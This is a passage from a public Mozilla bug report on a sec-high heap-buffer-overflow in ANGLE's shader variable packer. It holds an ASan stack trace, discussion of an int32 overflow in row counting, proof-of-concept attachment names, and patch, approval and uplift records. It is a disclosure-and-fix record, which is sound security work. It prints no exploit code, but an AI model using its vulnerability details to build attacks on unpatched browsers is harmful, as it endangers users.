    #70 0x7fd876af7725 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #71 0x7fd87694468a in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
    #72 0x7fd87694468a in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
    #73 0x7fd87694468a in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
    #74 0x7fd87509e84e in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:370:10
    #75 0x7fd8930b510f in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #76 0x555cd968b0fa in asan_thread_start(void*) /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:225:31

Thread T18 created by T0 here:
    #0 0x555cd967489d in pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:237:3
    #1 0x7fd8930a3834 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7fd89309142e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7fd8750a2319 in nsThread::Init(nsTSubstring<char> const&) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:619:20
    #4 0x7fd8750b2bc4 in nsThreadManager::NewNamedThread(nsTSubstring<char> const&, nsIThreadManager::ThreadCreationOptions, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:597:22
    #5 0x7fd8750c03a5 in NS_NewNamedThread(nsTSubstring<char> const&, nsIThread**, already_AddRefed<nsIRunnable>, nsIThreadManager::ThreadCreationOptions) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:176:57
    #6 0x7fd87816cde9 in NS_NewNamedThread<9UL> /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:76:10
    #7 0x7fd87816cde9 in mozilla::wr::RenderThread::Start(unsigned int) /builds/worker/checkouts/gecko/gfx/webrender_bindings/RenderThread.cpp:122:17
    #8 0x7fd877de227b in gfxPlatform::InitLayersIPC() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1312:7
    #9 0x7fd877ddb206 in gfxPlatform::Init() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:970:3
    #10 0x7fd877dd8e73 in gfxPlatform::GetPlatform() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:460:5
    #11 0x7fd87f690051 in nsWindow::Create(nsIWidget*, void*, mozilla::gfx::IntRectTyped<mozilla::LayoutDevicePixel> const&, mozilla::widget::InitData*) /builds/worker/checkouts/gecko/widget/gtk/nsWindow.cpp:6026:13
    #12 0x7fd87f472401 in nsIWidget::Create(nsIWidget*, void*, mozilla::gfx::IntRectTyped<mozilla::DesktopPixel> const&, mozilla::widget::InitData*) /builds/worker/checkouts/gecko/widget/nsIWidget.h:463:12
    #13 0x7fd883d7e9a3 in mozilla::AppWindow::Initialize(nsIAppWindow*, nsIAppWindow*, int, int, bool, mozilla::widget::InitData&) /builds/worker/checkouts/gecko/xpfe/appshell/AppWindow.cpp:213:17
    #14 0x7fd883da6f8f in nsAppShellService::JustCreateTopWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, bool, mozilla::AppWindow**) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:673:15
    #15 0x7fd883da7f1f in nsAppShellService::CreateTopLevelWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, nsIAppWindow**) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:179:8
    #16 0x7fd884a55160 in nsAppStartup::CreateChromeWindow(nsIWebBrowserChrome*, unsigned int, nsIOpenWindowInfo*, bool*, nsIWebBrowserChrome**) /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:757:15
    #17 0x7fd884c2a48f in nsWindowWatcher::CreateChromeWindow(nsIWebBrowserChrome*, unsigned int, nsIOpenWindowInfo*, nsIWebBrowserChrome**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:437:33
    #18 0x7fd884c2778d in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, nsTSubstring<char> const&, nsTSubstring<char> const&, nsTSubstring<char> const&, bool, bool, bool, nsIArray*, bool, bool, bool, nsPIWindowWatcher::PrintKind, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:1045:12
    #19 0x7fd884c21f42 in nsWindowWatcher::OpenWindow(mozIDOMWindowProxy*, nsTSubstring<char> const&, nsTSubstring<char> const&, nsTSubstring<char> const&, nsISupports*, mozIDOMWindowProxy**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:293:3
    #20 0x7fd8750fdce5 in NS_InvokeByIndex /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:101
    #21 0x7fd876e7d6e3 in Invoke /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1627:10
    #22 0x7fd876e7d6e3 in Call /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1180:19
    #23 0x7fd876e7d6e3 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1126:23
    #24 0x7fd876e833a0 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:966:10
    #25 0x7fd8851648b5 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:472:13
    #26 0x7fd8851648b5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:566:12
    #27 0x7fd88518986a in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:633:10
    #28 0x7fd88518986a in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:638:10
    #29 0x7fd88518986a in js::Interpret(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3053:16
    #30 0x7fd885163635 in MaybeEnterInterpreterTrampoline /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:386:10
    #31 0x7fd885163635 in js::RunScript(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:444:13
    #32 0x7fd885164a1e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:598:13
    #33 0x7fd8851669a6 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:633:10
    #34 0x7fd8851669a6 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:665:8
    #35 0x7fd8852bee92 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:55:10
    #36 0x7fd876e6bfaf in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedJSClass.cpp:918:17
    #37 0x7fd8750ff66a in PrepareAndDispatch /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:115:37
    #38 0x7fd8750fe40a in SharedStub xptcstubs_x86_64_linux.cpp
    #39 0x7fd8750329ff in NS_CreateServicesFromCategory(char const*, nsISupports*, char const*, char16_t const*) /builds/worker/checkouts/gecko/xpcom/components/nsCategoryManager.cpp:679:19
    #40 0x7fd884d79f64 in XREMain::XRE_mainRun() /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5414:5
    #41 0x7fd884d7cac4 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5882:8
    #42 0x7fd884d7dce1 in XRE_main(int, char**, mozilla::BootstrapConfig const&) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5938:21
    #43 0x555cd96ce6f3 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:227:22
    #44 0x555cd96ce6f3 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:445:16
    #45 0x7fd892e29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:141:20 in fillColumns
Shadow bytes around the buggy address:
  0x5210019a8680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x5210019a8700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x5210019a8780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x5210019a8800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x5210019a8880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x5210019a8900:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x5210019a8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x5210019a8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x5210019a8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x5210019a8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x5210019a8b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==16627==ABORTING
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.

Comment 1

[Renan Rios [:hyreos]]

ASAN stacktrace is below the HTML.
Looks like upload is limited to 10mb, shader code is here:
https://drive.google.com/file/d/1jcS2oVYs0_qq1Z77LNIjh7qmqwqudoz7/view?usp=sharing
Access is restricted by link.

Comment 2

[Tyson Smith [:tsmith]]

Attachment: testcase.html

Comment 3

[Tyson Smith [:tsmith]]

Attachment: fs.frag.zip

Comment 4

[BugBot [:suhaib / :marco/ :calixte]]

The severity field is not set for this bug.
:bhood, could you have a look please?

For more information, please visit BugBot documentation.

Comment 5

[Bob Hood [:bhood]]

Kelsey, anything we can do on our end, or should we file a report upstream with the ANGLE team?

Comment 6

[Kelsey Gilbert [:jgilbert]]

This sounds very plausible, but I'm not able to repro anything sec-high on my system. The shader appears to fail to compile for me.
I have tried my default Nightly install on Windows, and I have also tried an ASAN build, which doesn't seem to finish compiling the shader.
I am building a local opt build to try to catch this locally to prove it out.

Regardless, I see two paths towards fixing this, so we have options:

• A: Use something like Firefox's CheckedInt in ANGLE here (maybe ANGLE already has such a thing, but if not it's easy to add)
• B: Just use u64 for this, since we're counting by adding, and this would cause the required shader source size to become impossibly large

Comment 7

[Renan Rios [:hyreos]]

Attachment: linux_asan_test_poc_video.zip

Comment 8

[Renan Rios [:hyreos]]

Attachment: windows_regular_ff_install_poc_video.zip

Comment 9

[Renan Rios [:hyreos]]

Attachment: fs.frag.2.zip

Comment 10

[Renan Rios [:hyreos]]

Attachment: asan.log

Comment 11

[Kelsey Gilbert [:jgilbert]]

Sweet, ok yeah I can reproduce it with some fiddling.

Indeed here are the bad math values via printf:

18:37:48:558	topNonFullRow_: 1016, num3ColumnRows: 2147482632, INT32_MAX - topNonFullRow_: 2147482631.

Comment 12

[Renan Rios [:hyreos]]

Ah, thanks! I was about to post a much longer comment trying to deduce why this wasn't being reproducible (even made a new PoC), it seems that ASAN builds on Windows are extremely (like very) slow to reproduce this compared to Linux builds, that's why I I used a common Firefox installation on my windows laptop test (the Linux ASAN one was tested on another machine). And yes, ideally the right thing to do would be to do this kind of thing using u64s/checked integers.

Comment 13

[Kelsey Gilbert [:jgilbert]]

@Ken FYI!

Comment 14

[Kelsey Gilbert [:jgilbert]]

@Geoff FYI!

Comment 15

[Kelsey Gilbert [:jgilbert]]

Option B wip patch is here: https://github.com/mozilla/angle/tree/int64-rows-variable-packer

Comment 16

[BugBot [:suhaib / :marco/ :calixte]]

Redirect a needinfo that is pending on an inactive user to the triage owner.
:bhood, since the bug has high severity and recent activity, could you have a look please?

For more information, please visit BugBot documentation.

Comment 17

[Renan Rios [:hyreos]]

Hi, is there any update on the current status of this bug? Looks like there's a commit that refers to this bug in the upstream ANGLE repository:
https://chromium.googlesource.com/angle/angle/+/f8fae1ff4fae14fc6ba0aa1dc3af2e13a6e9a597

Comment 18

[Kelsey Gilbert [:jgilbert]]

Yes, we should do that.

Comment 19

[Kelsey Gilbert [:jgilbert]]

Attachment: Bug 1864587 - [angle] Vendor mozilla/angle/firefox-123.

Comment 20

[Kelsey Gilbert [:jgilbert]]

Comment on attachment 9370815 [details]
Bug 1864587 - [angle] Vendor mozilla/angle/firefox-123.

Security Approval Request

• How easily could an exploit be constructed based on the patch?: Medium difficult
• Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: Yes
• Which older supported branches are affected by this flaw?: all
• If not all supported branches, which bug introduced the flaw?: None
• Do you have backports for the affected branches?: No
• If not, how different, hard to create, and risky will they be?: Should be easy with no extra risk.
• How likely is this patch to cause regressions; how much testing does it need?: Unlikely, since this is vendored from [Chrome] already.
• Is Android affected?: Yes

Comment 21

[Tom Ritter [:tjr] (OOTO until April)]

Comment on attachment 9370815 [details]
Bug 1864587 - [angle] Vendor mozilla/angle/firefox-123.

Approved to land

Comment 22

[Ryan VanderMeulen [:RyanVM]]

FYI, ESR is going to need a rebased patch.

Comment 23

[Kelsey Gilbert [:jgilbert]]

Attachment: Bug 1864587 - [esr115] [angle] Vendor mozilla/angle/firefox-115.

Comment 24

[Kelsey Gilbert [:jgilbert]]

Comment on attachment 9370815 [details]
Bug 1864587 - [angle] Vendor mozilla/angle/firefox-123.

Beta/Release Uplift Approval Request

• User impact if declined: sec-high
• Is this code covered by automated tests?: No
• Has the fix been verified in Nightly?: Yes
• Needs manual test from QE?: No
• If yes, steps to reproduce:
• List of other uplifts needed: None
• Risk to taking this patch: Low
• Why is the change risky/not risky? (and alternatives if risky): Low risk, since it's from Chromium and applied cleanly.
• String changes made/needed: none
• Is Android affected?: Yes

Comment 25

[Kelsey Gilbert [:jgilbert]]

Comment on attachment 9371916 [details]
Bug 1864587 - [esr115] [angle] Vendor mozilla/angle/firefox-115.

ESR Uplift Approval Request

• If this is not a sec:{high,crit} bug, please state case for ESR consideration: sec-high
• User impact if declined: sec-high
• Fix Landed on Version: 123 (pending), 122 (requested)
• Risk to taking this patch: Low
• Why is the change risky/not risky? (and alternatives if risky): Clean backport of a relatively small chromium patch.

Comment 26

[Pulsebot]

Pushed by jgilbert@mozilla.com:
https://hg.mozilla.org/integration/autoland/rev/61e842ee7603
[angle] Vendor mozilla/angle/firefox-123. r=gfx-reviewers,aosmond

Comment 27

[Sebastian Hengst [:aryx] (needinfo me if it's about an intermittent or backout)]

https://hg.mozilla.org/mozilla-central/rev/61e842ee7603

Comment 28

[Donal Meehan [:dmeehan]]

Comment on attachment 9370815 [details]
Bug 1864587 - [angle] Vendor mozilla/angle/firefox-123.

Approved for 122.0b9

Comment 29

[Pulsebot]

https://hg.mozilla.org/releases/mozilla-beta/rev/82c481acd966

Comment 30

[Donal Meehan [:dmeehan]]

Comment on attachment 9371916 [details]
Bug 1864587 - [esr115] [angle] Vendor mozilla/angle/firefox-115.

Approved for 115.7esr.

Comment 31

[Pulsebot]

https://hg.mozilla.org/releases/mozilla-esr115/rev/5cc988e8734e

Comment 32

[Jesse Schwartzentruber (:truber)]

Attachment: advisory.txt

Comment 33

[Daniel Veditz [:dveditz]]

Making Firefox 122 security bugs public. [bugspam filter string: Pilgarlic-Towers]